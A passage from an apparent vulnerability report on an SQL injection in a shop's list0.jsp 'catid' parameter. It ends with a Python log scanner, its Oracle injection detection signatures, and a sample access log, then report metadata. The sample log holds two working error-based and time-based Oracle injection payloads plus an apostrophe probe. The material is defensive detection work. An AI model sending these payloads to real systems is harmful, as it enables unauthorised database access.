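# CHR(n)||CHR(n) concatenation both payloads use to avoid literal quotes.
SIGNATURES = {
    "oracle_error_based_xmltype": re.compile(r"\bXMLType\s*\(", re.I),
    "oracle_time_based_dbms_pipe": re.compile(r"\bDBMS_PIPE\.RECEIVE_MESSAGE\b", re.I),
    "oracle_case_from_dual": re.compile(r"\bCASE\s+WHEN\b.*\bFROM\s+DUAL\b", re.I | re.S),
    "chr_concat": re.compile(r"\bCHR\s*\(\s*\d+\s*\)\s*\|\|", re.I),
}

# Apache combined log format; only the request target and status are used.
REQUEST_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

# Constructed sample: a clean request, shortened copies of the two sqlmap
# payloads (URL-encoded as a client sends them), an unrelated path, and the
# manual apostrophe probe described in the report.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Nov/2015:01:35:10 +0800] "GET /m2c/2/list0.jsp?area_id=10034&key=&sdate=2015-11-10&tagid=&catid=&orderby=3&minprice=100&maxprice=700 HTTP/1.1" 200 5120
203.0.113.7 - - [10/Nov/2015:01:35:19 +0800] "GET /m2c/2/list0.jsp?area_id=10034&key=&sdate=2015-11-10&tagid=&catid=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(113)%7C%7C(SELECT%20(CASE%20WHEN%20(1434%3D1434)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(62)))%20FROM%20DUAL)&orderby=3&minprice=100&maxprice=700 HTTP/1.1" 500 873
203.0.113.7 - - [10/Nov/2015:01:35:25 +0800] "GET /m2c/2/list0.jsp?area_id=10034&key=&sdate=2015-11-10&tagid=&catid=(SELECT%20(CASE%20WHEN%20(7573%3D7573)%20THEN%20DBMS_PIPE.RECEIVE_MESSAGE(CHR(100)%7C%7CCHR(100)%7C%7CCHR(97)%7C%7CCHR(120),5)%20ELSE%207573%20END)%20FROM%20DUAL)&orderby=3&minprice=100&maxprice=700 HTTP/1.1" 200 5120
203.0.113.7 - - [10/Nov/2015:01:35:26 +0800] "GET /favicon.ico HTTP/1.1" 404 209
203.0.113.7 - - [10/Nov/2015:01:36:02 +0800] "GET /m2c/2/list0.jsp?area_id=10034&key=&sdate=2015-11-10&tagid=&catid=10%27&orderby=3&minprice=100&maxprice=700 HTTP/1.1" 500 873
"""


def check_params(query):
    """Return [(param, reason)] for every value that fails the allowlist.
    A server-side fix runs this before any value is used in SQL; an empty
    list means the request is acceptable."""
    problems = []
    for name, values in parse_qs(query, keep_blank_values=True).items():
        rule = PARAM_RULES.get(name)
        if rule is None:
            problems.append((name, "unexpected parameter"))
            continue
        for value in values:
            if not rule.match(value):
                problems.append((name, f"rejected value {value[:40]!r}"))
    return problems


def injection_signatures(query):
    """Return the set of signature names found in the URL-decoded values."""
    found = set()
    for values in parse_qs(query, keep_blank_values=True).values():
        for value in values:
            for name, pattern in SIGNATURES.items():
                if pattern.search(value):
                    found.add(name)
    return found


def scan_log(text):
    """Parse combined-format lines and annotate each list0.jsp request with
    its allowlist violations and any Oracle injection signatures."""
    results = []
    for line in text.splitlines():
        m = REQUEST_LINE.match(line)
        if not m:
            continue
        path, _, query = m.group("target").partition("?")
        if not path.endswith("/list0.jsp"):
            continue
        results.append({
            "ip": m.group("ip"),
            "status": int(m.group("status")),
            "violations": check_params(query),
            "signatures": injection_signatures(query),
        })
    return results


if __name__ == "__main__":
    for r in scan_log(SAMPLE_LOG):
        print(r["ip"], r["status"], sorted(r["signatures"]), r["violations"])
```

Two points the output makes visible: the apostrophe probe trips the allowlist but no signature, so signature matching alone would miss the manual test that found the bug, while the allowlist rejects every injected value including ones no signature covers. Validation is a filter, not the root fix; binding catid as a typed parameter in a prepared statement is what removes the injection.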
Proof of vulnerability: as above.
Suggested fix: filter the input.
Severity: High
Vulnerability Rank: 20
Confirmed: 2015-11-09 17:56
Vendor reply: thx
Latest status: none yet